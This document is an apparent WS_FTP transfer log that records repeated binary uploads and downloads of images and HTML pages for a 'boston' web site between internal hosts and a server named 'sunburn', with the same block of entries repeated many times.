10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
